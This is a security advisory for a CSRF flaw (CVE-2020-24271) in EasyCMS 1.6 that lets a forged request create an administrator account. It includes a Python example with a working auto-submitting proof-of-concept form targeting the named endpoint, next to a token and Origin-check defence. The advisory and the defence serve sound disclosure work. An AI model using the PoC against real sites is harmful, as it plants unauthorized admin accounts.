PT-2021-11024 · Easycms · Easycms

Published 2021-02-01 · Updated 2021-02-06 · CVE-2020-24271

CVSS v3.1: 8.8 (High)
Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: EasyCMS version 1.6
Description: A cross-site request forgery (CSRF) issue allows an attacker to add an administrator account. The "index.php?s=/admin/rbacuser/insert/navTabId/rbacuser/callbackType/closeCurrent" endpoint accepts a POST carrying username and password parameters and does not verify that the request was issued by the application's own form, so a logged-in administrator who is lured to an attacker-controlled page (the UI:R in the vector) submits the request unknowingly, with their own session cookie attached.
Recommendations: For EasyCMS version 1.6, as a temporary workaround until a patch is available, disable the insert functionality in the /admin/rbacuser module, or restrict access to the "index.php?s=/admin/rbacuser/insert/navTabId/rbacuser/callbackType/closeCurrent" endpoint (for example, to trusted network addresses) to minimize the risk of exploitation. Note that an address restriction alone does not stop CSRF, because the forged request comes from the administrator's own browser; until the endpoint is fixed, administrators should not browse untrusted sites while logged in to the admin panel, and any new accounts in the rbacuser table should be reviewed. The durable fix is the standard CSRF defence: a per-session token embedded in the admin form and checked on every state-changing request, ideally together with an Origin/Referer check.
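To make the description and the recommendation concrete, the following is an added example written for this page; it is not code from the advisory or from EasyCMS. The first function builds the kind of auto-submitting cross-site form the description implies, sending only the two parameters the advisory names (username and password) to the quoted endpoint; the base URL is a placeholder, and any other fields the real admin form may carry are not documented here and are deliberately not guessed. The second part shows the server-side gate the recommendation calls for: a per-session synchronizer token plus an Origin/Referer check, which rejects the forged request while admitting the legitimate form. The session dictionary and the allowed-origin value are assumptions standing in for the application's own session store and configuration.

```python
import hmac
import html
import secrets
from urllib.parse import urlsplit

# Endpoint path quoted in the advisory (CVE-2020-24271). The host is a placeholder.
ENDPOINT = "index.php?s=/admin/rbacuser/insert/navTabId/rbacuser/callbackType/closeCurrent"


def build_csrf_poc(base_url: str, username: str, password: str) -> str:
    """Return an HTML page that auto-submits a cross-site POST to the insert endpoint.

    Only the two parameters the advisory names (username, password) are sent.
    Values are HTML-escaped so a quote in the password cannot break the form.
    When a logged-in EasyCMS admin loads this page, the browser attaches the
    admin session cookie and the request is indistinguishable from a real submit.
    """
    action = base_url.rstrip("/") + "/" + ENDPOINT
    fields = "".join(
        f'<input type="hidden" name="{name}" value="{html.escape(value, quote=True)}">'
        for name, value in (("username", username), ("password", password))
    )
    return (
        '<html><body onload="document.forms[0].submit()">'
        f'<form method="POST" action="{html.escape(action, quote=True)}">{fields}</form>'
        "</body></html>"
    )


# ---- Server side: what a patched insert handler should check first ----------

def issue_token(session: dict) -> str:
    """Store a fresh synchronizer token in the (assumed) server-side session and
    return it so the legitimate admin form can embed it as a hidden field."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def is_state_change_allowed(session: dict, form: dict, headers: dict,
                            allowed_origin: str) -> tuple[bool, str]:
    """Gate a state-changing admin request such as /admin/rbacuser/insert.

    Checks, in order:
      1. Origin header (Referer as fallback) must equal the site's own origin.
      2. The form must carry the session's CSRF token, compared in constant time.
    A cross-site auto-submitted form fails (1) and cannot know the value for (2).
    Returns (allowed, reason) so the caller can log the rejection.
    """
    hdrs = {k.lower(): v for k, v in headers.items()}
    origin = hdrs.get("origin")
    if origin is None and hdrs.get("referer"):
        parts = urlsplit(hdrs["referer"])
        origin = f"{parts.scheme}://{parts.netloc}"
    if origin is None:
        return False, "missing Origin/Referer"
    if origin.lower() != allowed_origin.lower():
        return False, f"cross-site origin {origin}"

    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "bad CSRF token"
    return True, "ok"


if __name__ == "__main__":
    site = "http://easycms.example"  # placeholder host, not a real deployment
    print(build_csrf_poc(site, "backdoor", "Passw0rd!"))

    session = {}
    token = issue_token(session)
    forged = {"username": "backdoor", "password": "Passw0rd!"}
    print(is_state_change_allowed(session, forged,
                                  {"Origin": "http://attacker.example"}, site))
    legitimate = dict(forged, csrf_token=token)
    print(is_state_change_allowed(session, legitimate, {"Origin": site}, site))
```

The Origin check alone already stops the PoC above, but the token is kept because some browsers and privacy extensions strip Origin/Referer on navigations, and a handler that silently passes when both headers are absent would reopen the hole; here a request with neither header is rejected.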

Weakness Enumeration

CSRF

Related Identifiers

CVE-2020-24271

Affected Products

Easycms